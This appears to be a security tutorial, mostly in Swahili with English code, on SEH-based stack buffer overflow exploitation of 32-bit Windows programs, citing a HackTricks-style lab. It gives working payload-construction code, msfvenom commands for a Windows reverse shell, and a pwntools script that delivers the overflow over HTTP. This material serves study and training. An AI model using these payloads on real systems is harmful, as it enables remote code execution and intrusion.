Windows SEH-based Stack Overflow Exploitation (nSEH/SEH)

Reading time: 7 minutes

Utekelezaji wa SEH-based ni mbinu ya kawaida ya x86 Windows inayotumia mnyororo wa Structured Exception Handler uliohifadhiwa kwenye stack. Wakati stack buffer overflow inapobandika juu nywanja mbili za 4-byte

• nSEH: pointer to the next SEH record, and
• SEH: pointer to the exception handler function

mshambuliaji anaweza kuchukua udhibiti wa utekelezaji kwa:

1. Kuweka SEH kwa anwani ya gadget ya POP POP RET katika module isiyo na ulinzi, ili wakati exception itakapotumwa gadget irudie ndani ya bytes zinazo-dhibitiwa na mshambuliaji, na
2. Kutumia nSEH kupeleka tena utekelezaji (kawaida jump fupi) kurudi kwenye buffer kubwa iliyovuja ambapo shellcode inapatikana.

Mbinu hii ni maalum kwa michakato ya 32-bit (x86). Katika mifumo ya kisasa, chagua module bila SafeSEH na ASLR kwa ajili ya gadget. Wahusika wabaya mara nyingi ni 0x00, 0x0a, 0x0d (NUL/CR/LF) kutokana na C-strings na HTTP parsing.

Finding exact offsets (nSEH / SEH)

• Crash the process and verify the SEH chain is overwritten (e.g., in x32dbg/x64dbg, check the SEH view).
• Send a cyclic pattern as the overflowing data and compute offsets of the two dwords that land in nSEH and SEH.

Example with peda/GEF/pwntools on a 1000-byte POST body:

# generate pattern (any tool is fine)
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000
# or
python3 -c "from pwn import *; print(cyclic(1000).decode())"

# after crash, note the two 32-bit values from SEH view and compute offsets
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1000 -q 0x32424163   # nSEH
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1000 -q 0x41484241   # SEH
# ➜ offsets example: nSEH=660, SEH=664

Thibitisha kwa kuweka alama katika nafasi hizo (e.g., nSEH=b"BB", SEH=b"CC"). Weka urefu mzima usibadilike ili kufanya crash iweze kurudiwa.

Kuchagua POP POP RET (SEH gadget)

Unahitaji mfululizo wa POP POP RET ili kufungua fremu ya SEH na kurudi kwenye bytes zako za nSEH. Iipatie katika module isiyo na SafeSEH na ikiwezekana isiyo na ASLR:

• Mona (Immunity/WinDbg): !mona modules kisha !mona seh -m modulename.
• x64dbg plugin ERC.Xdbg: ERC --SEH kwa kuorodhesha POP POP RET gadgets na hali ya SafeSEH.

Chagua anwani ambayo haina badchars unapoandika little-endian (mfano, p32(0x004094D8)). Tendea kipaumbele gadgets ndani ya vulnerable binary ikiwa protections zinaruhusu.

Mbinu ya kuruka-nyuma (short + near jmp)

nSEH ni 4 bytes tu, ambayo inakidhi angalau short jump ya 2-byte (EB xx) pamoja na padding. Ikiwa lazima uruke nyuma mamia ya bytes kufikia mwanzo wa buffer yako, tumia 5-byte near jump iliyowekwa kabla ya nSEH na ui-chain nayo kwa short jump kutoka nSEH.

With nasmshell:

nasm> jmp -660           ; too far for short; near jmp is 5 bytes
E967FDFFFF
nasm> jmp short -8       ; 2-byte short jmp fits in nSEH (with 2 bytes padding)
EBF6
nasm> jmp -652           ; 8 bytes closer (to account for short-jmp hop)
E96FFDFFFF

Wazo la muundo wa payload ya 1000-byte yenye nSEH kwenye offset 660:

buffer_length = 1000
payload  = b"\x90"*50 + shellcode                    # NOP sled + shellcode at buffer start
payload += b"A" * (660 - 8 - len(payload))           # pad so we are 8 bytes before nSEH
payload += b"\xE9\x6F\xFD\xFF\xFF" + b"EEE"     # near jmp -652 (5B) + 3B padding
payload += b"\xEB\xF6" + b"BB"                      # nSEH: short jmp -8 + 2B pad
payload += p32(0x004094D8)                           # SEH: POP POP RET (no badchars)
payload += b"D" * (buffer_length - len(payload))

Mtiririko wa utekelezaji:

• Hitilafu inatokea, dispatcher anatumia SEH iliyobadilishwa.
• POP POP RET inaendelea hadi nSEH yetu.
• nSEH inatekeleza jmp short -8 kwenye 5-byte near jump.
• Near jump inaelekezwa mwanzoni mwa buffer yetu ambapo NOP sled + shellcode zinakaa.

Bad characters

Jenga string kamili ya badchar na linganisha kumbukumbu ya stack baada ya crash, ukiondoa bytes ambazo zimeharibika au kubadilishwa na parser ya target. Kwa overflow zinazotegemea HTTP, \x00\x0a\x0d karibu daima zinatengwa.

badchars = bytes([x for x in range(1,256)])
payload  = b"A"*660 + b"BBBB" + b"CCCC" + badchars  # position appropriately for your case

Shellcode generation (x86)

Tumia msfvenom na badchars zako. NOP sled ndogo husaidia kuvumilia tofauti za mahali pa kutua.

msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> \
-b "\x00\x0a\x0d" -f python -v sc

Ikiwa unazalisha kwa wakati halisi, muundo wa hex ni rahisi kuingiza na ku-unhex katika Python:

msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> \
-b "\x00\x0a\x0d" -f hex

Kupeleka kupitia HTTP (CRLF sahihi + Content-Length)

Wakati vektori dhaifu ni HTTP request body, unda raw request yenye CRLFs sahihi na Content-Length ili server isome kikamilifu body yote inayozidi.

# pip install pwntools
from pwn import remote
host, port = "<TARGET_IP>", 8080
body = b"A" * 1000  # replace with the SEH-aware buffer above
req = f"""POST / HTTP/1.1
Host: {host}:{port}
User-Agent: curl/8.5.0
Accept: */*
Content-Length: {len(body)}
Connection: close

""".replace('\n','\r\n').encode() + body
p = remote(host, port)
p.send(req)
print(p.recvall(timeout=0.5))
p.close()

Zana

• x32dbg/x64dbg ili kuona mnyororo wa SEH na kufanya triage ya crash.
• ERC.Xdbg (x64dbg plugin) kuorodhesha SEH gadgets: ERC --SEH.
• Mona kama mbadala: !mona modules, !mona seh.
• nasmshell kuassemble short/near jumps na kunakili raw opcodes.
• pwntools kutengeneza precise network payloads.

Vidokezo na tahadhari

• Inatumika tu kwa processes za x86. x64 inatumia SEH scheme tofauti na SEH-based exploitation kwa ujumla si viable.
• Pendelea gadgets zilizomo kwenye modules zisizo na SafeSEH na ASLR; vinginevyo, tafuta module isiyo na ulinzi iliyopakiwa kwenye process.
• Service watchdogs zinazorestart kiotomatiki baada ya crash zinaweza kurahisisha iterative exploit development.

Marejeo

• HTB: Rainbow – SEH overflow to RCE over HTTP (0xdf)
• ERC.Xdbg – Exploit Research Plugin for x64dbg (SEH search)
• Corelan – Exploit writing tutorial part 7 (SEH)
• Mona.py – WinDbg/Immunity helper